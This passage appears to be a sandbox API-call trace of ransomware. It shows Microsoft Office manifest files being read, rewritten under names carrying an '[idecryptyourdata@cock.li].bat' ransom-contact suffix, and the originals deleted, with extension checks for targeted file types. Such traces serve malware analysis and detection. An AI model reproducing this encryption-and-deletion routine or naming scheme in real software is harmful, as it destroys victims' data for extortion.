lpString2=".bat") returned 1 [0059.418] lstrlenW (lpString="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 53 [0059.418] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.418] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1261) returned 1 [0059.418] CloseHandle (hObject=0x358) returned 1 [0059.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml")) returned 0x220 [0059.419] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.419] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.419] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.419] GetLastError () returned 0x0 [0059.419] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0059.466] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0059.467] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.467] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.467] SetEndOfFile (hFile=0x350) returned 1 [0059.467] CloseHandle (hObject=0x350) returned 1 [0059.468] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.468] SetEndOfFile (hFile=0x358) returned 1 [0059.469] CloseHandle (hObject=0x358) returned 1 [0059.469] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.470] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml")) returned 1 [0059.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.470] lstrlenW (lpString=".doc") returned 4 [0059.470] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.470] lstrlenW (lpString=".docx") returned 5 [0059.470] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.470] lstrlenW (lpString=".pdf") returned 4 [0059.470] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.470] lstrlenW (lpString=".xls") returned 4 [0059.470] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.470] lstrlenW (lpString=".xlsx") returned 5 [0059.470] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.470] lstrlenW (lpString=".ppt") returned 4 [0059.470] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.470] lstrlenW (lpString=".zip") returned 4 [0059.470] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.470] lstrlenW (lpString=".rar") returned 4 [0059.470] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.470] lstrlenW (lpString=".bz2") returned 4 [0059.470] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.470] lstrlenW (lpString=".7z") returned 3 [0059.470] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.470] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.470] lstrlenW (lpString=".dbf") returned 4 [0059.471] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.471] lstrlenW (lpString=".1cd") returned 4 [0059.471] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.471] lstrlenW (lpString=".jpg") returned 4 [0059.471] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.471] lstrlenW (lpString=".doc") returned 4 [0059.471] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.471] lstrlenW (lpString=".docx") returned 5 [0059.471] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.471] lstrlenW (lpString=".pdf") returned 4 [0059.471] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.471] lstrlenW (lpString=".xls") returned 4 [0059.471] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.471] lstrlenW (lpString=".xlsx") returned 5 [0059.471] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.471] lstrlenW (lpString=".ppt") returned 4 [0059.471] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.471] lstrlenW (lpString=".zip") returned 4 [0059.471] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.471] lstrlenW (lpString=".rar") returned 4 [0059.471] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.471] lstrlenW (lpString=".bz2") returned 4 [0059.471] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.471] lstrlenW (lpString=".7z") returned 3 [0059.471] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.471] lstrlenW (lpString=".dbf") returned 4 [0059.471] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.471] lstrlenW (lpString=".1cd") returned 4 [0059.471] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml") returned 104 [0059.472] lstrlenW (lpString=".jpg") returned 4 [0059.472] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.472] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.472] lstrlenW (lpString="AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 53 [0059.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.472] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1450) returned 1 [0059.472] CloseHandle (hObject=0x358) returned 1 [0059.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml")) returned 0x220 [0059.472] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.473] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.473] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.473] GetLastError () returned 0x0 [0059.473] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x5aa, lpOverlapped=0x0) returned 1 [0059.485] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x5b0, lpOverlapped=0x0) returned 1 [0059.486] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.486] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.486] SetEndOfFile (hFile=0x350) returned 1 [0059.486] CloseHandle (hObject=0x350) returned 1 [0059.487] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.487] SetEndOfFile (hFile=0x358) returned 1 [0059.488] CloseHandle (hObject=0x358) returned 1 [0059.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.489] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e1-0000-1000-0000000ff1ce.xml")) returned 1 [0059.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.489] lstrlenW (lpString=".doc") returned 4 [0059.489] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.490] lstrlenW (lpString=".docx") returned 5 [0059.490] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.490] lstrlenW (lpString=".pdf") returned 4 [0059.490] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.490] lstrlenW (lpString=".xls") returned 4 [0059.490] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.490] lstrlenW (lpString=".xlsx") returned 5 [0059.490] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.490] lstrlenW (lpString=".ppt") returned 4 [0059.490] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.490] lstrlenW (lpString=".zip") returned 4 [0059.490] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.490] lstrlenW (lpString=".rar") returned 4 [0059.490] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.490] lstrlenW (lpString=".bz2") returned 4 [0059.490] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.490] lstrlenW (lpString=".7z") returned 3 [0059.490] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.490] lstrlenW (lpString=".dbf") returned 4 [0059.490] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.490] lstrlenW (lpString=".1cd") returned 4 [0059.490] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.490] lstrlenW (lpString=".jpg") returned 4 [0059.490] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.491] lstrlenW (lpString=".doc") returned 4 [0059.491] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.491] lstrlenW (lpString=".docx") returned 5 [0059.491] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.491] lstrlenW (lpString=".pdf") returned 4 [0059.491] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.491] lstrlenW (lpString=".xls") returned 4 [0059.491] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.491] lstrlenW (lpString=".xlsx") returned 5 [0059.491] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.491] lstrlenW (lpString=".ppt") returned 4 [0059.491] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.491] lstrlenW (lpString=".zip") returned 4 [0059.491] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.491] lstrlenW (lpString=".rar") returned 4 [0059.491] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.491] lstrlenW (lpString=".bz2") returned 4 [0059.491] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.491] lstrlenW (lpString=".7z") returned 3 [0059.491] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.491] lstrlenW (lpString=".dbf") returned 4 [0059.491] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.491] lstrlenW (lpString=".1cd") returned 4 [0059.491] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml") returned 104 [0059.492] lstrlenW (lpString=".jpg") returned 4 [0059.492] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.492] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.492] lstrlenW (lpString="AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 53 [0059.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.492] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=3754) returned 1 [0059.492] CloseHandle (hObject=0x358) returned 1 [0059.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml")) returned 0x220 [0059.492] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0059.493] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.493] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0059.493] GetLastError () returned 0x0 [0059.493] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xeaa, lpOverlapped=0x0) returned 1 [0059.533] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xeb0, lpOverlapped=0x0) returned 1 [0059.534] ReadFile (in: hFile=0x358, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.534] WriteFile (in: hFile=0x350, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.534] SetEndOfFile (hFile=0x350) returned 1 [0059.534] CloseHandle (hObject=0x350) returned 1 [0059.535] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.535] SetEndOfFile (hFile=0x358) returned 1 [0059.536] CloseHandle (hObject=0x358) returned 1 [0059.536] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.537] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00e2-0000-1000-0000000ff1ce.xml")) returned 1 [0059.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.537] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.537] lstrlenW (lpString=".doc") returned 4 [0059.537] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.537] lstrlenW (lpString=".docx") returned 5 [0059.537] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.537] lstrlenW (lpString=".pdf") returned 4 [0059.537] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.537] lstrlenW (lpString=".xls") returned 4 [0059.537] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.537] lstrlenW (lpString=".xlsx") returned 5 [0059.537] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.537] lstrlenW (lpString=".ppt") returned 4 [0059.538] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.538] lstrlenW (lpString=".zip") returned 4 [0059.538] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.538] lstrlenW (lpString=".rar") returned 4 [0059.538] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.538] lstrlenW (lpString=".bz2") returned 4 [0059.538] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.538] lstrlenW (lpString=".7z") returned 3 [0059.538] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.538] lstrlenW (lpString=".dbf") returned 4 [0059.538] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.538] lstrlenW (lpString=".1cd") returned 4 [0059.538] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.538] lstrlenW (lpString=".jpg") returned 4 [0059.538] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.538] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml") returned 104 [0059.538] lstrlenW (lpString=".doc") returned 4 [0059.538] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.538] lstrlenW (lpString=".docx") returned 5 [0059.538] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.538] lstrlenW (lpString=".pdf") returned 4 [0059.538] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.538] lstrlenW (lpString=".xls") returned 4 [0059.539] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.539] lstrlenW (lpString=".xlsx") returned 5 [0059.539] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.539] lstrlenW (lpString=".ppt") returned 4 [0059.539] lstrcmpiW 